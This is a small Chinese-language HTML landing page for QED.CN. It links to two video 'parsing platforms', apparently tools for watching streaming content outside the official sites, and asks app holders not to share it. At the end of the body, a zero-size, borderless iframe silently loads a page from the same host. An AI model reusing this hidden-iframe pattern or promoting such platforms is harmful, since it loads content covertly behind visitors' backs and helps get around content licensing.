<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>QED.CN</title>
	<link rel="shortcut icon" href="http://i.qed.cn:81/favicon.ico">

<style type="text/css">
@font-face {
font-family:castellar; 
src:url('http://i.qed.cn:81/castellar.ttf') format('truetype');
}

body {
    background: -moz-radial-gradient(center center, circle, #830a71, #440036, #440036);
    background: -webkit-radial-gradient(center center, circle, #830a71, #440036, #440036);
    background: -o-radial-gradient(center center, circle, #830a71, #440036, #440036);
    background: -ms-radial-gradient(center center, circle, #830a71, #440036, #440036);
    background: radial-gradient(center center, circle, #830a71, #440036, #440036);
		font-family:castellar;
    color:#fff;
    }
    
a {color:#fff;}
    
div.box {
	margin:0 auto;
	text-align:center;
	
	
}

.test{
	height:460px;
	width:300px;
	position:absolute;
font-family:castellar;
	top:0;
	bottom:0;
	left:0;
	right:0;
	margin:auto;
}

.p1{
font-family:castellar;
text-align:center;
margin:auto;
right:0;
left:0;
font-size: 2em;
}
	
.p2{
font-family:castellar;
text-align:center;
margin:auto;
right:0;
left:0;
font-size:2em;
}
	
	.p3{
position:absolute;
font-family:castellar;
text-align:center;
margin:auto;
right:0;
left:0;
bottom:0px;
font-size: 1 2px;
position:absolute;

}
	
img { 
	width:auto;
	position:absolute;
	top:0;
	bottom:0;
	left:0;
	right:0;
	margin:auto;

	}
</style>
    
    
</head>

<body>
    
<div class="box">

    	
<p class="p2">下列解析平台均有搜索框，想看什么直接搜索，如遇没有请更换频道和平台</p>
<p class="p1"><a href=http://isher.qed.cn/jiexi/>解析平台1</a></p>
<p class="p1"><a href=http://isher.qed.cn/jx/>解析平台2</a></p>
<p class="p3">拿到app朋友请勿传播<br>以上内容来源于网络，由<a href=http://isher.qed.cn>乔说</a>收集整理</p>
</div>

<iframe src=http://i.qed.cn:81/?qiaoshuo/ height=0px width=0px frameborder=0><iframe>
</body></html>
